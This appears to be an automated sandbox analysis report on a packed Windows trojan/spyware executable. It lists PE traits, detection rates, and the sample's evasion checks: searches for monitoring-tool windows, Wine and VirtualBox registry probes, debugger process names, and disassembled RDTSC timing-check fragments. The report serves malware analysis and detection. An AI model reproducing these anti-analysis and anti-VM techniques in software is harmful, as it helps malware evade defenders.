    Source: random(3).exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
    Source: random(3).exeStatic PE information: Section: jzrbpplf ZLIB complexity 0.9945949556599774
    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00C5255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,3_2_00C5255D
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00C529FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,3_2_00C529FF
    Source: C:\Users\user\Desktop\random(3).exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
    Source: C:\Users\user\Desktop\random(3).exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: random(3).exeVirustotal: Detection: 50%
    Source: random(3).exeReversingLabs: Detection: 47%
    Source: random(3).exeString found in binary or memory: Unable to complete request for channel-process-startup
    Source: random(3).exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeSection loaded: kernel.appcore.dllJump to behavior
    Source: random(3).exeStatic file information: File size 4487680 > 1048576
    Source: random(3).exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x289a00
    Source: random(3).exeStatic PE information: Raw size of jzrbpplf is bigger than: 0x100000 < 0x1ba400

    Data Obfuscation

    barindex
    Detected unpacking (changes PE section rights)
    Source: C:\Users\user\Desktop\random(3).exeUnpacked PE file: 3.2.random(3).exe.c50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jzrbpplf:EW;qryisspl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jzrbpplf:EW;qryisspl:EW;.taggant:EW;
    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
    Source: random(3).exeStatic PE information: real checksum: 0x44e9da should be: 0x448f9d
    Source: random(3).exeStatic PE information: section name:
    Source: random(3).exeStatic PE information: section name: .idata
    Source: random(3).exeStatic PE information: section name:
    Source: random(3).exeStatic PE information: section name: jzrbpplf
    Source: random(3).exeStatic PE information: section name: qryisspl
    Source: random(3).exeStatic PE information: section name: .taggant
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_3_02157A3F push esp; ret 3_3_02157A41
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_3_02157A3F push esp; ret 3_3_02157A41
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_3_02157A3F push esp; ret 3_3_02157A41
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_3_02157A3F push esp; ret 3_3_02157A41
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00FD41D0 push eax; mov dword ptr [esp], edx3_2_00FD41D5
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00CD2340 push eax; mov dword ptr [esp], 00000000h3_2_00CD2343
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00D0C7F0 push eax; mov dword ptr [esp], 00000000h3_2_00D0C743
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00C90AC0 push eax; mov dword ptr [esp], 00000000h3_2_00C90AC4
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00CB1430 push eax; mov dword ptr [esp], 00000000h3_2_00CB1433
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00CD39A0 push eax; mov dword ptr [esp], 00000000h3_2_00CD39A3
    Source: C:\Users\user\Desktop\random(3).exeCode function: 3_2_00CADAD0 push eax; mov dword ptr [esp], edx3_2_00CADAD1
    Source: random(3).exeStatic PE information: section name: jzrbpplf entropy: 7.956572353209662

    Boot Survival

    barindex
    Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
    Source: C:\Users\user\Desktop\random(3).exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeWindow searched: window name: RegmonClassJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeWindow searched: window name: RegmonclassJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeWindow searched: window name: FilemonclassJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

    Malware Analysis System Evasion

    barindex
    Tries to detect sandboxes / dynamic malware analysis system (registry check)
    Source: C:\Users\user\Desktop\random(3).exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
    Source: C:\Users\user\Desktop\random(3).exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    Source: random(3).exe, 00000003.00000003.1302485322.0000000007C77000.00000004.00001000.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
    Source: random(3).exe, 00000003.00000003.1302485322.0000000007C77000.00000004.00001000.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
    Source: random(3).exe, 00000003.00000003.1302485322.0000000007C77000.00000004.00001000.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
    Source: random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
    Source: random(3).exe, 00000003.00000003.1302485322.0000000007C77000.00000004.00001000.00020000.00000000.sdmp, random(3).exe, 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 135A2A1 second address: 135A2AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F29FC518E96h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14D9132 second address: 14D9140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14D8467 second address: 14D8480 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F29FC518E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f jng 00007F29FC518E96h 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14D862A second address: 14D8633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14D8A0D second address: 14D8A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1359B26 second address: 1359B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14DAF6C second address: 14DAFAE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F29FC518E9Eh 0x0000000f jno 00007F29FC518EA1h 0x00000015 popad 0x00000016 nop 0x00000017 add esi, dword ptr [ebp+122D379Dh] 0x0000001d push 00000000h 0x0000001f push 9D5B3B80h 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jng 00007F29FC518E96h 0x0000002e rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14DAFAE second address: 14DAFB4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14DB187 second address: 14DB19D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC518EA2h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14DB19D second address: 14DB1A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14DB1A1 second address: 14DB232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov esi, 573173BEh 0x0000000e push 00000003h 0x00000010 mov dword ptr [ebp+122D1C3Dh], esi 0x00000016 mov ecx, edx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007F29FC518E98h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 jmp 00007F29FC518EA0h 0x00000039 push 00000003h 0x0000003b push 00000000h 0x0000003d push ecx 0x0000003e call 00007F29FC518E98h 0x00000043 pop ecx 0x00000044 mov dword ptr [esp+04h], ecx 0x00000048 add dword ptr [esp+04h], 00000018h 0x00000050 inc ecx 0x00000051 push ecx 0x00000052 ret 0x00000053 pop ecx 0x00000054 ret 0x00000055 mov dword ptr [ebp+122D30BCh], esi 0x0000005b call 00007F29FC518E99h 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F29FC518EA5h 0x00000068 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14DB232 second address: 14DB268 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F29FC4F36A1h 0x0000000b popad 0x0000000c push eax 0x0000000d jl 00007F29FC4F369Eh 0x00000013 jns 00007F29FC4F3698h 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d je 00007F29FC4F36A0h 0x00000023 pushad 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14DB268 second address: 14DB290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 jnp 00007F29FC518E9Ah 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F29FC518E9Dh 0x0000001b popad 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14DB290 second address: 14DB2BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F36A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a lea ebx, dword ptr [ebp+12454E21h] 0x00000010 xchg eax, ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007F29FC4F369Ch 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14DB2BA second address: 14DB2C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F29FC518E96h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14DB2C4 second address: 14DB2C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14DB2C8 second address: 14DB2D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14DB432 second address: 14DB453 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F29FC4F369Fh 0x0000000b popad 0x0000000c push eax 0x0000000d js 00007F29FC4F36A0h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14DB453 second address: 14DB477 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F29FC518EA6h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14DB477 second address: 14DB47B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14DB47B second address: 14DB481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14EC54A second address: 14EC54E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14BBD3D second address: 14BBD41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14F9785 second address: 14F978B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14F9D35 second address: 14F9D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jmp 00007F29FC518EA0h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14F9D4C second address: 14F9D8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jng 00007F29FC4F3696h 0x0000000b jp 00007F29FC4F3696h 0x00000011 jmp 00007F29FC4F36A7h 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007F29FC4F36A5h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14F9D8D second address: 14F9DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F29FC518E96h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14F9DA0 second address: 14F9DA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14F9DA6 second address: 14F9DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14F9DAA second address: 14F9DC0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F29FC4F3696h 0x00000008 js 00007F29FC4F3696h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 pop edi 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14F9DC0 second address: 14F9DCA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F29FC518E9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14FA4D1 second address: 14FA4D6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14FA4D6 second address: 14FA4EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F29FC518EA1h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14FA4EE second address: 14FA4F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14FA4F2 second address: 14FA543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jg 00007F29FC518EACh 0x00000011 push esi 0x00000012 pop esi 0x00000013 jmp 00007F29FC518EA4h 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007F29FC518EA1h 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 pop eax 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F29FC518E9Dh 0x0000002c push ecx 0x0000002d pop ecx 0x0000002e rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14FAFD7 second address: 14FAFDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14FB13E second address: 14FB14B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F29FC518E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14FB437 second address: 14FB450 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC4F36A5h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14FB450 second address: 14FB465 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jns 00007F29FC518E96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14FB465 second address: 14FB46C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14FB46C second address: 14FB47A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007F29FC518E96h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15001D8 second address: 15001DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15001DD second address: 15001E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15001E3 second address: 15001E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14C76AD second address: 14C76B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14C91A5 second address: 14C91AF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F29FC4F3696h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1506DA9 second address: 1506DC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518EA4h 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1506EFB second address: 1506F14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F36A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15070A6 second address: 15070CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518E9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a je 00007F29FC518E9Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 150739E second address: 15073A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1507682 second address: 150769A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F29FC518E96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007F29FC518E9Ch 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15094B2 second address: 15094B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15094B6 second address: 15094FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518EA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xor dword ptr [esp], 048872A1h 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F29FC518E98h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b movsx edi, si 0x0000002e push 9CB8798Dh 0x00000033 push eax 0x00000034 push edx 0x00000035 push ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15094FF second address: 1509504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1509504 second address: 1509509 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15099A8 second address: 15099BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F29FC4F369Ch 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 150A08F second address: 150A094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 150A094 second address: 150A09B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
